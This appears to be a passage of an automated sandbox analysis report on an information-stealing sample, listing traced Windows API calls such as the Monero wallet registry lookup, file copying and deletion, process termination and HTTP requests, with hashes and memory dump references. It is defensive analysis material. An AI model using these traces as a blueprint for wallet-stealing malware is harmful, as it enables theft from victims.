                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00414E3E
                                                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(0000EA60), ref: 00414E4D
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00413B80: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413C14
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00413B80: lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00422019), ref: 00413C2B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00413B80: StrStrA.SHLWAPI(00000000,00000000), ref: 00413C57
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00413B80: lstrlen.KERNEL32(00000000), ref: 00413C6C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00413B80: lstrlen.KERNEL32(00000000), ref: 00413C89
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcpylstrlen$Sleep
                                                                                                                                                                                                                                                                                                  • String ID: -$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                                                                                                                                                                                                                                  • API String ID: 507064821-1903984052
                                                                                                                                                                                                                                                                                                  • Opcode ID: c96fb55f8d8bf10598374de45fbc6fc312ce8e8bb0848338d8377d4eb4593662
                                                                                                                                                                                                                                                                                                  • Instruction ID: 6a2bbd2f173dbc1054a30c93a0a01a9f01b5700f65783502aefbb1eff031eee4
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c96fb55f8d8bf10598374de45fbc6fc312ce8e8bb0848338d8377d4eb4593662
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2AB28470C01248EACB14EBB5C9566DDBBB86F15308F5480BEE945736C2DB78670CCBA6
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

Control-flow Graph (legend: Executed / Not Executed)
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00427618,?,?,?,?,?,?,?,00416AC2,?), ref: 0041655C
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,0042761C,?,?,?,?,?,?,?,00416AC2,?), ref: 00416576
                                                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 0041659B
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00427343,?,?,?,?,?,?,?,?,?,?,?,00416AC2,?), ref: 004165AD
                                                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 004165D5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004118D0: GetFileSizeEx.KERNEL32(00000000,?), ref: 004118FF
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004118D0: CloseHandle.KERNEL32(00000000), ref: 0041190A
                                                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 004165F7
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0041660D
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 00416620
                                                                                                                                                                                                                                                                                                  • strtok_s.MSVCRT ref: 00416636
                                                                                                                                                                                                                                                                                                  • strtok_s.MSVCRT ref: 00416663
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0041667C
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 0041668C
                                                                                                                                                                                                                                                                                                  • strtok_s.MSVCRT ref: 004166A2
                                                                                                                                                                                                                                                                                                  • PathMatchSpecA.SHLWAPI(?,00000000), ref: 004166BA
                                                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 004166FD
                                                                                                                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041674B
                                                                                                                                                                                                                                                                                                  • strtok_s.MSVCRT ref: 0041675E
                                                                                                                                                                                                                                                                                                  • FindNextFileA.KERNELBASE(?,?,?,?,?,?,?,?,?,00416AC2,?), ref: 00416872
                                                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(?,?,?,?,?,?,?,?,00416AC2,?), ref: 00416884
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: strtok_swsprintf$CloseFileFindlstrcatmemset$HandleMatchNextPathSizeSpecUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                                  • String ID: %s%s$%s\%s$%s\%s\%s
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410090: StrCmpCA.SHLWAPI(?,00000000,?,00407476,0156F7B8,?,00000000,?), ref: 0041009A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FEB0: lstrlen.KERNEL32(00418579,?,00000000,?,00417CAD,00427387,00427386,00000000,?,00000000,00422CB8,000000FF,?,00418579), ref: 0040FEBB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FEB0: lstrcpy.KERNEL32(00000000,00418579), ref: 0040FEF2
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,01562F00,?), ref: 0041001C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411450: GetSystemTime.KERNEL32(?,0156F048,00427270,?,00000000,00000008,?,?,00000000,00421AA1,000000FF,?,0040460E,0041FDC9,00000014), ref: 004114A5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF50: lstrcpy.KERNEL32(00000000), ref: 0040FFB3
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF50: lstrcat.KERNEL32(?,00000000), ref: 0040FFBF
                                                                                                                                                                                                                                                                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,00000000,?), ref: 0040751F
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 004077D6
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00000000), ref: 00407925
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00426A98), ref: 00407934
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00000000), ref: 00407947
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00426A9C), ref: 00407956
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00000000), ref: 00407969
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00426AA0), ref: 00407978
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00000000), ref: 0040798B
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00426AA4), ref: 0040799A
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00000000), ref: 004079AD
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00426AA8), ref: 004079BC
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00000000), ref: 004079CF
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00426AAC), ref: 004079DE
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00000000), ref: 00407A25
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00426AB0), ref: 00407A43
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(000000FF), ref: 00407AAA
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(000000FF), ref: 00407AB9
                                                                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 004077DD
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE60: lstrcpy.KERNEL32(00000000), ref: 0040FE88
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411A20: memset.MSVCRT ref: 00411A55
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411A20: GetProcessHeap.KERNEL32(00000000,000000FA,?,00000000,?,00407546,0040DA84), ref: 00411A86
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411A20: HeapAlloc.KERNEL32(00000000,?,00407546,0040DA84), ref: 00411A8D
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411A20: wsprintfW.USER32 ref: 00411A9C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411A20: OpenProcess.KERNEL32(00001001,00000000), ref: 00411AFD
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411A20: TerminateProcess.KERNEL32(00000000,00000000), ref: 00411B0C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411A20: CloseHandle.KERNEL32(00000000), ref: 00411B13
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00407B10
                                                                                                                                                                                                                                                                                                  • DeleteFileA.KERNEL32(00000000,?,?,?,00426A62), ref: 00407B38
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcat$lstrcpy$HeapProcesslstrlen$Filememset$AllocAllocateCloseCopyDeleteHandleOpenSystemTerminateTimewsprintf
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,01562F00,?), ref: 0041001C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411450: GetSystemTime.KERNEL32(?,0156F048,00427270,?,00000000,00000008,?,?,00000000,00421AA1,000000FF,?,0040460E,0041FDC9,00000014), ref: 004114A5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF50: lstrcpy.KERNEL32(00000000), ref: 0040FFB3
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF50: lstrcat.KERNEL32(?,00000000), ref: 0040FFBF
                                                                                                                                                                                                                                                                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000000,00426A9F,00000009), ref: 004097F6
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00409962
                                                                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00409969
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00000000), ref: 00409AAF
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00426C78), ref: 00409ABE
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00000000), ref: 00409AD1
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00426C7C), ref: 00409AE0
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00000000), ref: 00409AF3
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00426C80), ref: 00409B02
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00000000), ref: 00409B15
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00426C84), ref: 00409B24
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00000000), ref: 00409B37
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00426C88), ref: 00409B46
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00000000), ref: 00409B59
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00426C8C), ref: 00409B68
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00000000), ref: 00409B7B
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00426C90), ref: 00409B8A
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(000000FF), ref: 00409C00
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(000000FF), ref: 00409C0F
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00409C65
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410090: StrCmpCA.SHLWAPI(?,00000000,?,00407476,0156F7B8,?,00000000,?), ref: 0041009A
                                                                                                                                                                                                                                                                                                  • DeleteFileA.KERNEL32(00000000), ref: 00409C8D
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1973479514-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 74e1f64ca746990e000dc16853746c1c8c4e6ee652172f2314a50c48505eac86
                                                                                                                                                                                                                                                                                                  • Instruction ID: f39e1bd7dab92496fbde9404480356453d89dcc36ccb70b28e1b0f1b61e95687
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 74e1f64ca746990e000dc16853746c1c8c4e6ee652172f2314a50c48505eac86
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BB025C71900148EADB14EBE4DD55BEEBB79AF19304F10817EF502B3292DB786A08CB75
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE60: lstrcpy.KERNEL32(00000000), ref: 0040FE88
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404430: ??_U@YAPAXI@Z.MSVCRT ref: 00404482
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404430: ??_U@YAPAXI@Z.MSVCRT ref: 0040448F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404430: ??_U@YAPAXI@Z.MSVCRT ref: 0040449C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404430: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044B6
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404430: InternetCrackUrlA.WININET(00000000,00000000), ref: 004044C6
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405AF8
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,0156F958,?,?,?,?,?,?,00000004), ref: 00405B10
                                                                                                                                                                                                                                                                                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405B34
                                                                                                                                                                                                                                                                                                  • HttpOpenRequestA.WININET(00000000,GET,?,015724D8,00000000,00000000,-00400100,00000000), ref: 00405B6B
                                                                                                                                                                                                                                                                                                  • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405B8F
                                                                                                                                                                                                                                                                                                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00405B9A
                                                                                                                                                                                                                                                                                                  • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00405BB8
                                                                                                                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,?,000007CF,00420039), ref: 00405C05
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,01562F00,?), ref: 0041001C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,?,000007CF,00420039), ref: 00405C5B
                                                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00405C66
                                                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(?), ref: 00405C70
                                                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00405C7A
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequestlstrlen$ConnectCrackInfoOptionQuerySendlstrcat
                                                                                                                                                                                                                                                                                                  • String ID: ERROR$ERROR$GET$;A$;A
                                                                                                                                                                                                                                                                                                  • API String ID: 1851261701-2536196751
                                                                                                                                                                                                                                                                                                  • Opcode ID: 9429579aba8b7dc35131f515e91d8e296aee0c1f4835abc00abfe40e63ec2ece
                                                                                                                                                                                                                                                                                                  • Instruction ID: f51bac302368146bc70526799d3d27fc4bd2090a82c05307e47728f2a195adfa
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9429579aba8b7dc35131f515e91d8e296aee0c1f4835abc00abfe40e63ec2ece
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EC618071900218AFEB10DBA4CC85FEFB77DEB45744F40412AFA01B3281DB786E448BA5
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • strtok_s.MSVCRT ref: 00412396
                                                                                                                                                                                                                                                                                                  • lstrcpy.KERNEL32(?,00000000), ref: 00412423
                                                                                                                                                                                                                                                                                                  • lstrcpy.KERNEL32(?,00000000), ref: 00412460
                                                                                                                                                                                                                                                                                                  • lstrcpy.KERNEL32(?,00000000), ref: 004124A9
                                                                                                                                                                                                                                                                                                  • lstrcpy.KERNEL32(?,00000000), ref: 004124F2
                                                                                                                                                                                                                                                                                                  • lstrcpy.KERNEL32(?,00000000), ref: 0041253A
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,true,?), ref: 004126C5
                                                                                                                                                                                                                                                                                                  • strtok_s.MSVCRT ref: 00412752
                                                                                                                                                                                                                                                                                                  Strings
Memory Dump Source
• Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcpy$strtok_s
                                                                                                                                                                                                                                                                                                  • String ID: false$true
                                                                                                                                                                                                                                                                                                  • API String ID: 2610293679-2658103896
                                                                                                                                                                                                                                                                                                  • Opcode ID: ce137c0223425141530cf3f77ebad13e5dede02dc8e5628b2fc49f88788a9856
                                                                                                                                                                                                                                                                                                  • Instruction ID: 9783b729b2b96f1e089f7dd286e8eef65b2713682f5ee12b46c125a55e388804
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ce137c0223425141530cf3f77ebad13e5dede02dc8e5628b2fc49f88788a9856
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EEC10A75800109EFDB14EBA4DD85EDEB779AF05304F00816EF616A3292DA385789CBA5
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE60: lstrcpy.KERNEL32(00000000), ref: 0040FE88
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404430: ??_U@YAPAXI@Z.MSVCRT ref: 00404482
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404430: ??_U@YAPAXI@Z.MSVCRT ref: 0040448F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404430: ??_U@YAPAXI@Z.MSVCRT ref: 0040449C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404430: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044B6
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404430: InternetCrackUrlA.WININET(00000000,00000000), ref: 004044C6
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF,?,?,?,?,?,?,00000000), ref: 00404C5B
                                                                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,?,?,?,?,?,00000000), ref: 00404C62
                                                                                                                                                                                                                                                                                                  • InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00404C80
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,0156F958,?,?,?,?,?,?,00000000), ref: 00404C96
                                                                                                                                                                                                                                                                                                  • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404CC1
                                                                                                                                                                                                                                                                                                  • HttpOpenRequestA.WININET(00000000,GET,?,015724D8,00000000,00000000,-00400100,00000000), ref: 00404CFB
                                                                                                                                                                                                                                                                                                  • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00404D20
                                                                                                                                                                                                                                                                                                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00404D32
                                                                                                                                                                                                                                                                                                  • HttpQueryInfoA.WININET(000000FF,00000013,?,?,00000000), ref: 00404D54
                                                                                                                                                                                                                                                                                                  • InternetReadFile.WININET(000000FF,?,00000400,00000001), ref: 00404DC4
                                                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00404DF5
                                                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00404DFF
                                                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(?), ref: 00404E09
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Internet$CloseHandleHttp$HeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
                                                                                                                                                                                                                                                                                                  • String ID: GET
                                                                                                                                                                                                                                                                                                  • API String ID: 442264750-1805413626
                                                                                                                                                                                                                                                                                                  • Opcode ID: c8598b76782b08933c13cff9c97261692f6bb3eeeac1fb73a4ca9257dacd5c94
                                                                                                                                                                                                                                                                                                  • Instruction ID: d281c038e4fc1d43085ff1e335aac5a1d2015f5d0f0e8fc3e36784ae5f7bfe4e
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c8598b76782b08933c13cff9c97261692f6bb3eeeac1fb73a4ca9257dacd5c94
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EF6164B5A00219ABEB20DBA4DC45FEFB7B9EB49710F104129FA15F72C0D7789904CBA5
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00401D74
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00401D8A
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00401D91
                                                                                                                                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,004021A1), ref: 00401DAE
                                                                                                                                                                                                                                                                                                  • RegQueryValueExA.ADVAPI32(004021A1,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401DC8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE60: lstrcpy.KERNEL32(00000000), ref: 0040FE88
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004153E0: Sleep.KERNEL32(000003E8,00422591,PdA,?,?,?,00000001), ref: 004154A5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004153E0: CreateThread.KERNEL32(00000000,00000000,00413E10,?,00000000,00000000), ref: 004154C6
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004153E0: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004154D2
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 00401DE0
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(?), ref: 00401DED
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,.keys), ref: 00401E08
